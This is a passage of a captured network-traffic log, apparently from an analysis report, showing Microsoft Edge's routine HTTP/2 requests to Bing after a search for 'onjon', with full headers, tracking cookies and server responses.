sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1af29
GET

https://www.bing.com/images/sbi?mmasync=1&ig=6AB2CD56EF6C4338BF41C655438BDF1B&iid=.5097&ptn=Web&ep=0&iconpl=1

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /images/sbi?mmasync=1&ig=6AB2CD56EF6C4338BF41C655438BDF1B&iid=.5097&ptn=Web&ep=0&iconpl=1 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1af2e
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22Time%22%3A947%2C%22time%22%3A957%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1733306920516%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22Time%22%3A947%2C%22time%22%3A957%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1733306920516%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1af2f
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A958%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1733306920517%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A958%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1733306920517%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 771
content-type: text/html; charset=utf-8
cache-control: no-cache, no-store, must-revalidate
content-encoding: br
expires: -1
pragma: no-cache
vary: Accept-Encoding
x-eventid: 67502a310e074cd4b9ac5f6dcbe6ba78
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-45M5zH9YpcZO6j/cRaRec63m5A5nZwUAogBNUuwrbcM='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-ceto-ref: 67502a310e074cd4b9ac5f6dcbe6ba78|AFD:67502a310e074cd4b9ac5f6dcbe6ba78|2024-12-04T10:08:49.572Z
date: Wed, 04 Dec 2024 10:08:49 GMT
set-cookie: _C_ETH=1; expires=Tue, 03 Dec 2024 10:08:49 GMT; domain=.bing.com; path=/; secure; httponly
set-cookie: _C_Auth=
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1af34
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A958%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1733306920517%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A958%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1733306920517%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 996
content-type: text/html; charset=utf-8
cache-control: no-cache
content-encoding: br
expires: -1
pragma: no-cache
vary: Accept-Encoding
x-eventid: 67502a31efbd44379a3cb292b00bd9de
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-19lv7UbSGQOhjrUSEso429QAlkye7f0HsmFPm8/bDe4='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-ceto-ref: 67502a31efbd44379a3cb292b00bd9de|AFD:67502a31efbd44379a3cb292b00bd9de|2024-12-04T10:08:49.589Z
date: Wed, 04 Dec 2024 10:08:49 GMT
set-cookie: _C_ETH=1; expires=Tue, 03 Dec 2024 10:08:49 GMT; domain=.bing.com; path=/; secure; httponly
set-cookie: _C_Auth=
set-cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; domain=.bing.com; expires=Thu, 04-Dec-2025 10:08:49 GMT; path=/; secure; SameSite=None
set-cookie: _Rwho=u=d&ts=2024-12-04; domain=.bing.com; path=/; secure; HttpOnly; SameSite=None
set-cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1af4e
POST

https://www.bing.com/rewardsapp/ncheader?ver=51619320&IID=SERP.5054&IG=6AB2CD56EF6C4338BF41C655438BDF1B

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /rewardsapp/ncheader?ver=51619320&IID=SERP.5054&IG=6AB2CD56EF6C4338BF41C655438BDF1B HTTP/2.0
host: www.bing.com
content-length: 4
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: application/x-www-form-urlencoded
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _C_Auth=
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1b0a5
POST

